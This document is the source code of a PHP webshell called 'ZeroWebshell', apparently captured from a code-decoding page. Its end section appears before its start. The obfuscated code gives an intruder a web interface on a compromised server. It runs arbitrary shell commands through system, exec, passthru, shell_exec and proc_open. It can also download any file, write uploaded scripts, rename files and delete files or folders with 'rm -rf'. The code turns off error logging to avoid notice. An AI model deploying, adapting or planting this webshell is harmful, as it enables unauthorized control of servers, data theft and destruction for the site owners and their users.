<input class='form-control btn-sm' type='text' value='".basename($oex3131800080)."' name='r_d' $hqb3270591348>
<button class='btn btn-outline-light btn-sm' type='submit'><i class='bi bi-arrow-return-right'></i></button>
</div>
</form>";}if(isset($azu3293050475['r_f'])){$eau1063113957=$kxc2359244304;$nkh1810056261=$azu3293050475['new_name'];rename($nkh1810056261,$eau1063113957);if(file_exists($nkh1810056261)){echo '<div class="alert alert-warning alert-dismissible fade show my-3" role="alert">
<strong>Rename file</strong> name already in use! <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>
</div>';}else{if(rename($eau1063113957,$nkh1810056261)){echo '<strong>Rename file</strong> OK! '.ok().'</div>';}else{echo '<strong>Rename file</strong> FAIL! '.er().'</div>';}}}if($azu3293050475['action']=='rename'){s();echo"
<div class='btn-group'>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=view&opn=$kxc2359244304'><i class='bi bi-eye-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=edit&opn=$kxc2359244304'><i class='bi bi-pencil-square'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=rename&opn=$kxc2359244304'><i class='bi bi-pencil-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=download&opn=$kxc2359244304'><i class='bi bi-download'></i></a>
<a class='btn btn-outline-danger btn-sm' href='?dir=$sol190089999&action=delete_file&opn=$kxc2359244304'><i class='bi bi-trash-fill'></i></a>
</div>
<br>
<i class='bi bi-file-earmark'></i>: ".basename($kxc2359244304)."
</br>
<form method='POST'>
<div class='input-group'>
<input class='form-control btn-sm' type='text' name='new_name' value='".basename($kxc2359244304)."' $hqb3270591348>
<button class='btn btn-outline-light btn-sm' type='sumbit' name='r_f'><i class='bi bi-arrow-return-right'></i></button>
</div>
</form>";}if($azu3293050475['action']=='delete_file'){s();if($azu3293050475['yeahx']){$bwe974290055=unlink($kxc2359244304);if($bwe974290055){echo '<strong>Delete file</strong> OK! '.ok().'</div>';}else{echo '<strong>Delete file</strong> FAIL! '.er().'</div>';}}echo"
<div class='btn-group mb-3'>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=view&opn=$kxc2359244304'><i class='bi bi-eye-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=edit&opn=$kxc2359244304'><i class='bi bi-pencil-square'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=rename&opn=$kxc2359244304'><i class='bi bi-pencil-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=download&opn=$kxc2359244304'><i class='bi bi-download'></i></a>
<a class='btn btn-outline-danger btn-sm' href='?dir=$sol190089999&action=delete_file&opn=$kxc2359244304'><i class='bi bi-trash-fill'></i></a>
</div>
<div class='card card-body text-dark input-group mb-3'>
<p>Are you sure to delete : ".basename($kxc2359244304)." ?</p>
<form method='POST'>
<a class='btn btn-dark btn-block btn-sm' href='?dir=$oex3131800080'>No</a>
<input type='submit' name='yeahx' class='btn btn-success btn-block btn-sm' value='Yes'>
</form>
</div>";}if($azu3293050475['action']=='delete_folder'){s();if($azu3293050475['yeah']){if(is_dir($oex3131800080)){if(is_writable($oex3131800080)){@rmdir($oex3131800080);@exe("rm -rf $oex3131800080");@exe("rmdir /s /q $oex3131800080");echo '<strong>Delete folder</strong> OK! '.ok().'<a class="btn-close" href="?path='.dirname($oex3131800080).'"></a></div>';}else{echo '<strong>Delete folder</strong> FAIL! '.er().'<a class="btn-close" href="?path='.dirname($oex3131800080).'"></a></div>';}}}echo"
<div class='btn-group mb-3'>
<a class='btn btn-outline-dark btn-sm' href='?dir=$sol190089999&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>
<a class='btn btn-outline-danger btn-sm' href='?dir=$sol190089999&action=delete_folder'><i class='bi bi-trash-fill'></i></a>
</div>
<div class='card card-body text-dark input-group mb-3'>
<p>Are you sure to delete : ".basename($oex3131800080)." ?</p>
<form method='POST'>
<a class='btn btn-dark btn-block btn-sm' href='?dir=".dirname($oex3131800080)."'>No</a>
<input type='submit' name='yeah' class='btn btn-success btn-block btn-sm' value='Yes'>
</form>
</div>";}if(isset($azu3293050475['filenew'])){s();if(isset($azu3293050475['bikin'])){$tqk1579384326=$azu3293050475['name_file'];$uvm1243076500=$azu3293050475['contents_file'];foreach($tqk1579384326 as $kyi3408522343){$bbh2441093337=@fopen("$kyi3408522343","w");if($uvm1243076500){$ldx2413224187=@fwrite($bbh2441093337,$uvm1243076500);}else{$ldx2413224187=$bbh2441093337;}}if($ldx2413224187){echo"<script>window.location='?path=$sol190089999'</script>";}else{echo '<strong>Create file</strong> FAIL! '.er().'</div>';}}echo"
<div class='mb-3'>
<form method='POST'>
<i class='bi bi-file-earmark'></i> Filename:
<input class='form-control form-control-sm text-dark' type='text' name='name_file[]' placeholder='filename' $hqb3270591348>
<i class='bi bi-file-earmark'></i> Your script:
<textarea class='form-control form-control-sm text-dark' name='contents_file' rows='7' placeholder='your script' $hqb3270591348></textarea>
<div class='d-grid gap-2'><br>
<input class='btn btn-outline-light btn-sm' type='submit' name='bikin' value='Create'>
</div>
</form>
</div>";}if(isset($azu3293050475['dirnew'])){s();if(isset($azu3293050475['create'])){$tqk1579384326=$azu3293050475['name_dir'];foreach($tqk1579384326 as $zzw3200152318){$rjy3970042317=preg_replace("([^wsd-_~,;:[](].]|[.]{2,})",'',$zzw3200152318);$agb950107039=@mkdir($rjy3970042317);}if($agb950107039){echo"<script>window.location='?path=$sol190089999'</script>";}else{echo '<strong>Create dir</strong> FAIL! '.er().'</div>';}}echo"
<div class='mb-3'>
<form method='POST'>
<i class='bi bi-folder'></i> Directory name:
<div class='input-group mb-3'>
<input class='form-control form-control-sm text-dark' type='text' name='name_dir[]' placeholder='Dir name' $hqb3270591348>
<input class='btn btn-outline-light btn-sm' type='submit' name='create' value='Create Directory'>
</div>
</form>
</div>";}echo '
<div class="table-responsive">
<table class="table table-hover table-dark text-light">
<thead>
<tr>
<td class="text-center">Name</td>
<td class="text-center">Type</td>
<td class="text-center">Last Edit</td>
<td class="text-center">Size</td>
<td class="text-center">Owner<gr>/</gr>Group</td>
<td class="text-center">Permission</td>
<td class="text-center">Action</td>
</tr>
</thead>
<tbody class="text-nowrap">
<tr>
<td><i class="bi bi-folder2-open"></i><a class="text-decoration-none text-secondary" href="?path='.dirname($oex3131800080).'">..</a></td><td></td><td></td><td></td><td></td><td></td><td class="text-center">
<div class="btn-group">
<a class="btn btn-outline-light btn-sm" href="?filenew&path='.$oex3131800080.'"><i class="bi bi-file-earmark-plus-fill"></i></a>
<a class="btn btn-outline-light btn-sm" href="?dirnew&path='.$oex3131800080.'"><i class="bi bi-folder-plus"></i></a>
</div>
</td>
</tr>';foreach($oue2843178896 as $oex3131800080){$uqm387975545=date("Y-m-d G:i",filemtime("$sol190089999/$oex3131800080"));if(strlen($oex3131800080)>25){$qdp908457509=substr($oex3131800080,0,25)."...";}else{$qdp908457509=$oex3131800080;}if(function_exists('posix_getpwuid')){$mdr736492942=@posix_getpwuid(fileowner("$sol190089999/$oex3131800080"));$mdr736492942=$mdr736492942['name'];}else{$mdr736492942=fileowner("$sol190089999/$oex3131800080");}if(function_exists('posix_getgrgid')){$bcu2509506725=@posix_getgrgid(filegroup("$sol190089999/$oex3131800080"));$bcu2509506725=$bcu2509506725['name'];}else{$bcu2509506725=filegroup("$sol190089999/$oex3131800080");}if(!is_dir($sol190089999.'/'.$kxc2359244304))continue;$sjz4156564586=filesize($sol190089999.'/'.$kxc2359244304)/1024;$sjz4156564586=round($sjz4156564586,3);if($sjz4156564586>=1024){$sjz4156564586=round($sjz4156564586/1024,2).' MB';}else{$sjz4156564586=$sjz4156564586.' KB';}if(!is_dir($sol190089999.'/'.$oex3131800080)||$oex3131800080=='.'||$oex3131800080=='..')continue;echo"
<tr>
<td><i class='bi bi-folder-fill'></i><a class='text-decoration-none text-secondary' href='?dir=$sol190089999/$oex3131800080'>$qdp908457509</a></td>
<td class='text-center'>dir</td>
<td class='text-center'>$uqm387975545</td>
<td class='text-center'>-</td>
<td class='text-center'>$mdr736492942<gr>/</gr>$bcu2509506725</td>
<td class='text-center'>";if(is_writable($sol190089999.'/'.$oex3131800080))echo '<gr>';elseif(!is_readable($sol190089999.'/'.$oex3131800080))echo '<rd>';echo p($sol190089999.'/'.$oex3131800080);if(is_writable($sol190089999.'/'.$oex3131800080)||!is_readable($sol190089999.'/'.$oex3131800080))echo '</font></center></td>';echo"
<td class='text-center'>
<div class='btn-group'>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999/$oex3131800080&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>
<a class='btn btn-outline-danger btn-sm txt' href='?dir=$sol190089999/$oex3131800080&action=delete_folder'><i class='bi bi-trash-fill'></i></a>
</div>
</td>
</tr>";}foreach($oue2843178896 as $kxc2359244304){$mgh622226427=date("Y-m-d G:i",filemtime("$sol190089999/$kxc2359244304"));if(function_exists('posix_getpwuid')){$frv1714248837=@posix_getpwuid(fileowner("$sol190089999/$kxc2359244304"));$frv1714248837=$frv1714248837['name'];}else{$frv1714248837=fileowner("$sol190089999/$kxc2359244304");}if(function_exists('posix_getgrgid')){$flf1067302958=@posix_getgrgid(filegroup("$sol190089999/$kxc2359244304"));$flf1067302958=$flf1067302958['name'];}else{$flf1067302958=filegroup("$sol190089999/$kxc2359244304");}if(!is_file($sol190089999.'/'.$kxc2359244304))continue;if(strlen($kxc2359244304)>25){$nhp3626735369=substr($kxc2359244304,0,25)."...-.".$xsf30643714;}else{$nhp3626735369=$kxc2359244304;}echo"
<tr>
<td><i class='bi bi-file-earmark-text-fill'></i><a class='text-decoration-none text-secondary' href='?dir=$sol190089999&action=view&opn=$kxc2359244304'>$nhp3626735369</a></td>
<td class='text-center'>file</td>
<td class='text-center'>$mgh622226427</td>
<td class='text-center'>".sz(filesize($kxc2359244304))."</td>
<td class='text-center'>$frv1714248837<gr>/</gr>$flf1067302958</td>
<td class='text-center'>";if(is_writable($sol190089999.'/'.$kxc2359244304))echo '<gr>';elseif(!is_readable($sol190089999.'/'.$kxc2359244304))echo '<rd>';echo p($sol190089999.'/'.$kxc2359244304);if(is_writable($sol190089999.'/'.$kxc2359244304)||!is_readable($sol190089999.'/'.$kxc2359244304))echo '</gr></rd></td>';echo"
<td class='text-center'>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=view&opn=$sol190089999/$kxc2359244304'><i class='bi bi-eye-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=edit&opn=$sol190089999/$kxc2359244304'><i class='bi bi-pencil-square'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=rename&opn=$sol190089999/$kxc2359244304'><i class='bi bi-pencil-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir=$sol190089999&action=download&opn=$sol190089999/$kxc2359244304'><i class='bi bi-download'></i></a>
<a class='btn btn-outline-danger btn-sm' href='?dir=$sol190089999&action=delete_file&opn=$sol190089999/$kxc2359244304'><i class='bi bi-trash-fill'></i></a>
</div>
</td>
</tr>";}?>
</tbody>
</table>
</div><center><div class='text-secondary'><hr><font color=white>© Shizuo1337</font></div></center>
</div>
</div>
</body>
</html>
Did this file decode correctly?
Original Code
<?php session_start();set_time_limit(0);error_reporting(0);@ini_set('error_log',null);@ini_set('log_errors',0);@ini_set('max_execution_time',0);@ini_set('output_buffering',0);@ini_set('display_errors',0);$azu3293050475=array_merge($_POST,$_GET);$hqb3270591348="required='required'";$wje845731916="getcwd";if(isset($azu3293050475['opn'])&&($azu3293050475['opn']!='')&&($azu3293050475['action']=='download')){@ob_clean();$kxc2359244304=$azu3293050475['opn'];header('Content-Description: File Transfer');header('Content-Type: application/octet-stream');header('Content-Disposition: attachment; filename="'.basename($kxc2359244304).'"');header('Expires: 0');header('Cache-Control: must-revalidate');header('Pragma: public');header('Content-Length: '.filesize($kxc2359244304));readfile($kxc2359244304);exit;}function w($oex3131800080,$fld711815386){if(!is_writable($oex3131800080)){return "<rd>".$fld711815386."</rd>";}else{return "<gr>".$fld711815386."</gr>";}}function s(){echo '<style>table{display:none;}</style><div class="table-responsive"><center><hr></hr></center></div>';}function ok(){echo '<div class="alert alert-success alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>';}function er(){echo '<div class="alert alert-dark alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>';}function sz($xji495432134){$isx37857821=array('B','KB','MB','GB','TB');for($iie3865851505=0;$xji495432134>=1024&&$iie3865851505<(count($isx37857821)-1);$xji495432134/=1024,$iie3865851505++);return(round($xji495432134,2)." ".$isx37857821[$iie3865851505]);}function ia(){$yhz3478361055='';if(getenv('HTTP_CLIENT_IP'))$yhz3478361055=getenv('HTTP_CLIENT_IP');else if(getenv('HTTP_X_FORWARDED_FOR'))$yhz3478361055=getenv('HTTP_X_FORWARDED_FOR');else if(getenv('HTTP_X_FORWARDED'))$yhz3478361055=getenv('HTTP_X_FORWARDED');else if(getenv('HTTP_FORWARDED_FOR'))$yhz3478361055=getenv('HTTP_FORWARDED_FOR');else if(getenv('HTTP_FORWARDED'))$yhz3478361055=getenv('HTTP_FORWARDED');else if(getenv('REMOTE_ADDR'))$yhz3478361055=getenv('REMOTE_ADDR');else $yhz3478361055='Unknown IP';return $yhz3478361055;}function exe($enu794565824){if(function_exists('system')){@ob_start();@system($enu794565824);$fez1965507171=@ob_get_contents();@ob_end_clean();return $fez1965507171;}elseif(function_exists('exec')){@exec($enu794565824,$ufh2678318100);$fez1965507171="";foreach($ufh2678318100 as $mdb325763347){$fez1965507171.=$mdb325763347;}return $fez1965507171;}elseif(function_exists('passthru')){@ob_start();@passthru($enu794565824);$fez1965507171=@ob_get_contents();@ob_end_clean();return $fez1965507171;}elseif(function_exists('shell_exec')){$fez1965507171=@shell_exec($enu794565824);return $fez1965507171;}}function exe_root($vwh3860080092,$prj2681204924){$hen2363233923="preg_match";$mrc4175501327="2>&1";if(!$hen2363233923("/".$mrc4175501327."/i",$vwh3860080092)){$vwh3860080092=$vwh3860080092." ".$mrc4175501327;}$fov3904355907="function_exists";$nnx1908338681="proc_open";$cjx112844655="htmlspecialchars";$gxs2564639436="stream_get_contents";if($fov3904355907($nnx1908338681)){$sci2817149839=$nnx1908338681($vwh3860080092,array(0=>array("pipe","r"),1=>array("pipe","w"),2=>array("pipe","r")),$bsg744714710,$prj2681204924);return $gxs2564639436($bsg744714710[1]);}else{return "proc_open function is disabled!";}}function p($kxc2359244304){$ppg2181537457=fileperms($kxc2359244304);if(($ppg2181537457&0xC000)==0xC000){$iie3865851505='s';}elseif(($ppg2181537457&0xA000)==0xA000){$iie3865851505='l';}elseif(($ppg2181537457&0x8000)==0x8000){$iie3865851505='-';}elseif(($ppg2181537457&0x6000)==0x6000){$iie3865851505='b';}elseif(($ppg2181537457&0x4000)==0x4000){$iie3865851505='d';}elseif(($ppg2181537457&0x2000)==0x2000){$iie3865851505='c';}elseif(($ppg2181537457&0x1000)==0x1000){$iie3865851505='p';}else{$iie3865851505='u';}$iie3865851505.=(($ppg2181537457&0x0100)?'r':'-');$iie3865851505.=(($ppg2181537457&0x0080)?'w':'-');$iie3865851505.=(($ppg2181537457&0x0040)?(($ppg2181537457&0x0800)?'s':'x'):(($ppg2181537457&0x0800)?'S':'-'));$iie3865851505.=(($ppg2181537457&0x0020)?'r':'-');$iie3865851505.=(($ppg2181537457&0x0010)?'w':'-');$iie3865851505.=(($ppg2181537457&0x0008)?(($ppg2181537457&0x0400)?'s':'x'):(($ppg2181537457&0x0400)?'S':'-'));$iie3865851505.=(($ppg2181537457&0x0004)?'r':'-');$iie3865851505.=(($ppg2181537457&0x0002)?'w':'-');$iie3865851505.=(($ppg2181537457&0x0001)?(($ppg2181537457&0x0200)?'t':'x'):(($ppg2181537457&0x0200)?'T':'-'));return $iie3865851505;}if(isset($azu3293050475['dir'])){$oex3131800080=$azu3293050475['dir'];chdir($oex3131800080);}else{$oex3131800080=$wje845731916();}echo "
<html>
<head>
<meta charset='utf-8'>
<meta name='author' content='Shizuo1337'>
<meta name='viewport' content='width=device-width, initial-scale=0.40'>
<link rel='icon' href='//i.ibb.co/mbRDLgS/cat-logo-E6-BC30-BEB2-seeklogo-com-removebg-preview.png'>
<title>ZeroWebshell</title>
<script src='//cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/prism.js'></script>
<script src='//cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js'></script>
<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>
<style>@import url('//cdn.jsdelivr.net/npm/[email protected]/font/bootstrap-icons.css');@import url('//cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css');@import url('//cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/themes/prism-okaidia.css');@import url('https://fonts.googleapis.com/css2?family=Ubuntu+Condensed');@import url('https://fonts.googleapis.com/css2?family=Sedgwick+Ave&display=swap');@import url('https://fonts.googleapis.com/css2?family=Cormorant');body {cursor: url('data:image/x-icon;base64,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'), auto;font-family:'Ubuntu Condensed';}.shell{border-radius: 4px;border: 1px solid rgba(255, 255, 255, 0.4);font-size: 10pt;display: flex;flex-direction: column;align-items: stretch;background: #242424;color: #fff;}.pre{height: 150px;overflow: auto;white-space: pre-wrap;flex-grow: 1;margin:10px auto;padding:10px;line-height:1.3em;overflow-x:scroll;}.anu,kbd{font-family: 'Sedgwick Ave', cursive;}.corner{text-align: right;margin-top: -10px;font-size:12px;}gr {color:#54A700;}rd {color:red;}.php_info pre {margin: 0; font-family: monospace;}.php_info table {color: #000; border-collapse: collapse; border: 0; width: 934px; box-shadow: 1px 2px 3px #ccc;}.center {text-align: center;}.center table {margin: 1em auto; text-align: left;}.center th {text-align: center !important;}.php_info td, th {border: 1px solid #666; font-size: 75%; vertical-align: baseline; padding: 4px 5px;}.p {text-align: left;}.e {background-color: #ccf; width: 300px; font-weight: bold;}.h {background-color: #99c; font-weight: bold;}.v {background-color: #ddd; max-width: 300px; overflow-x: auto; word-wrap: break-word;}.v i {color: #999;}img {float: right; border: 0;}hr {width: 934px; background-color: #ccc; border: 0; height: 1px;}h1 {font-size: 150%;}h2 {font-size: 125%;}</style>
</head>
<body class='bg-secondary text-light'>
<div class='container-fluid'>
<div class='py-3' id='main'>
<div class='box shadow bg-dark p-4 rounded-3'>
